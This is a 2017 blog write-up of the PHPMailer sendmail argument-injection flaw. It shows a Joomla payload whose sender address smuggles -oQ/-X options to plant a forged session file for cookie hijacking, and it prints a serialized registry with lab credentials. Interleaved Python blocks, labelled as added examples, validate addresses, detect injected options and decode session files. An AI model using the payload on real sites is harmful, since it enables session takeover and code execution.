Monday, 2 January 2017

Using PHPMailer vulnerability to take the session

At the end of 2016 the world was shocked by a remote code execution exploit for PHPMailer.

It is a very common third-party library, used by Drupal, WordPress, Joomla and a number of other top web projects.

The root cause of this vulnerability is insufficient filtering of the email address when it is used as an argument for the sendmail utility, which is executed via the system shell. As a result, a remote attacker can write an arbitrary file by using sendmail's -X (log file) argument.

The obvious way to exploit this is to upload a web shell. However, that depends on two requirements:
  1. The attacker must know the full path to the web root directory (like /var/www).
  2. The web application must have file system privileges to write into one of the web directories.
We suggest another way to exploit this vulnerability that needs neither of these requirements: uploading a session file.
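The defensive side of the mechanism above, as an added example that is not code from the original post: RFC 5322 allows quoted local parts, so a syntactically valid address can carry spaces, quotes and extra sendmail options. The validator below rejects such addresses, the argv builder keeps sendmail off the shell entirely, and the last helper lists option-looking tokens inside a submitted sender for log review. The sender string is the one from this post; the sendmail invocation (-oi -f -t) and all function names are assumptions.

```python
import re

# Dot-atom local parts and dotted domains (RFC 5322 atext); quoted local parts such as
# "john doe"@example.com are valid addresses but are deliberately excluded here.
_LOCAL = re.compile(r"^[A-Za-z0-9!#$%&'*+/=?^_`{|}~-]+(\.[A-Za-z0-9!#$%&'*+/=?^_`{|}~-]+)*$")
_DOMAIN = re.compile(r'^[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$')

# The sender address from this post's Joomla example, as a Python literal.
EXPLOIT_SENDER = '"attacker\\" -oQ/tmp/ -X/tmp/sess_f8af03562e674480401098254fe223e0  some"@email.com'

def is_shell_safe_address(addr: str) -> bool:
    """True only for plain local@domain addresses with no quotes, spaces or backslashes, so the
    RFC-valid quoted local part the exploit relies on is rejected before any command is built."""
    local, at, domain = addr.rpartition('@')
    return bool(at) and bool(_LOCAL.match(local)) and bool(_DOMAIN.match(domain))

def sendmail_argv(sendmail_path: str, sender: str) -> list:
    """Build the sendmail command as an argv list for a shell-free exec, e.g.
    subprocess.run(argv, input=message): even a hostile sender stays one argument
    and cannot smuggle extra -X / -oQ options onto the command line."""
    if not is_shell_safe_address(sender):
        raise ValueError(f'refusing sender that is not shell-safe: {sender!r}')
    return [sendmail_path, '-oi', '-f' + sender, '-t']

def option_tokens(addr: str) -> list:
    """Detection aid for log review: option-looking tokens (-X..., -oQ...) embedded in a
    submitted sender address; a legitimate address contains none."""
    return re.findall(r'\s(-[A-Za-z]\S*)', addr)
```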

For Joomla the exploit could look like this:
$email_from = '"attacker\" -oQ/tmp/ -X/tmp/sess_f8af03562e674480401098254fe223e0  some"@email.com';
$msg_body  = 'joomla|s:1572:"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";';

Then set the value f8af03562e674480401098254fe223e0 as the session cookie and take the profit :)

Moreover, in the Joomla case the base64 body also contains serialized data:
O:24:"Joomla\Registry\Registry":3:{s:7:"*data";O:8:"stdClass":1:{s:9:"__default";O:8:"stdClass":3:{s:7:"session";O:8:"stdClass":3:{s:7:"counter";i:8;s:5:"timer";O:8:"stdClass":3:{s:5:"start";i:1483388063;s:4:"last";i:1483388136;s:3:"now";i:1483388365;}s:5:"token";s:32:"nZlydWX1Cx3Ugn8QmcK7DgDbMNFA1Qdy";}s:8:"registry";O:24:"Joomla\Registry\Registry":3:{s:7:"*data";O:8:"stdClass":0:{}s:14:"*initialized";b:1;s:9:"separator";s:1:".";}s:5:"setup";O:8:"stdClass":2:{s:7:"helpurl";s:74:"https://help.joomla.org/proxy/index.php?keyref=Help{major}{minor}:{keyref}";s:7:"options";a:15:{s:9:"site_name";s:14:"russia-related";s:11:"admin_email";s:12:"asd@asds.com";s:10:"admin_user";s:5:"admin";s:14:"admin_password";s:28:"russia-relatedrussia-related";s:13:"site_metadesc";s:0:"";s:12:"site_offline";i:0;s:8:"language";s:5:"en-US";s:7:"helpurl";s:74:"https://help.joomla.org/proxy/index.php?keyref=Help{major}{minor}:{keyref}";s:7:"db_type";s:6:"mysqli";s:7:"db_host";s:9:"127.0.0.1";s:7:"db_user";s:4:"root";s:7:"db_pass";s:12:"my-secret-pw";s:7:"db_name";s:4:"test";s:6:"db_old";s:6:"backup";s:9:"db_prefix";s:6:"pkc6q_";}}}}s:14:"*initialized";b:0;s:9:"separator";s:1:".";}

So the attacker could also escalate this to RCE.
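Added example, not code from the post: a small decoder for PHP's default session file format (name|serialized pairs, as in the joomla|s:1572:"..." line above) and for PHP serialization itself, so a responder can read a sess_* file found in /tmp and the Joomla registry it carries, credentials included. The sample session is constructed here to mirror the structure of the post's dump; only the token string is taken from it, and the function names are assumptions.

```python
import base64
def _unserialize(data: str, pos: int):
    """Parse one PHP value at data[pos] -> (value, offset after it); objects become dicts with '__class__'."""
    t = data[pos]
    if t == 'N':                                      # N;
        return None, pos + 2
    if t in 'ibd':                                    # i:8;  b:1;  d:1.5;
        end = data.index(';', pos)
        return {'i': int, 'd': float, 'b': lambda v: v == '1'}[t](data[pos + 2:end]), end + 1
    if t == 's':                                      # s:<bytelen>:"<bytes>";
        colon = data.index(':', pos + 2)
        start = colon + 2                             # skip :"
        end = start + int(data[pos + 2:colon])
        return data[start:end], end + 2               # skip ";
    if t in 'aO':                                     # a:<n>:{...}   O:<len>:"<class>":<n>:{...}
        items = {}
        if t == 'O':
            colon = data.index(':', pos + 2)
            items['__class__'] = data[colon + 2:colon + 2 + int(data[pos + 2:colon])]
            pos = colon + len(items['__class__']) + 4  # after "<class>":
        else:
            pos += 2
        colon = data.index(':', pos)
        count, pos = int(data[pos:colon]), colon + 2  # skip :{
        for _ in range(count):
            key, pos = _unserialize(data, pos)
            items[key], pos = _unserialize(data, pos)
        return items, pos + 1                         # skip }
    raise ValueError(f'unsupported PHP type {t!r} at offset {pos}')

def decode_session_file(raw: bytes) -> dict:
    """Decode the default 'php' session handler format: name|<serialized>name|<serialized>..."""
    data = raw.decode('latin-1')   # 1 byte == 1 char, so PHP byte lengths are valid offsets
    result, pos = {}, 0
    while pos < len(data):
        bar = data.index('|', pos)
        result[data[pos:bar]], pos = _unserialize(data, bar + 1)
    return result

def joomla_session_registry(raw: bytes) -> dict:
    """Joomla keeps its session registry as base64(serialize(Registry)) under the 'joomla' key."""
    inner = base64.b64decode(decode_session_file(raw)['joomla']).decode('latin-1')
    return _unserialize(inner, 0)[0]

# Constructed sample mirroring the structure of the post's dump (not the real captured file);
# protected properties serialize as "\0*\0name", which is why the dump shows s:7:"*data".
INNER = ('O:24:"Joomla\\Registry\\Registry":1:{s:7:"\0*\0data";O:8:"stdClass":1:{s:7:"session";'
         'O:8:"stdClass":2:{s:7:"counter";i:8;s:5:"token";s:32:"nZlydWX1Cx3Ugn8QmcK7DgDbMNFA1Qdy";}}}')
_B64 = base64.b64encode(INNER.encode('latin-1'))
SAMPLE_SESS = b'joomla|s:%d:"%s";' % (len(_B64), _B64)
```

Session files written by other handlers (php_serialize stores one plain serialized array) need only `_unserialize` on the whole file.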
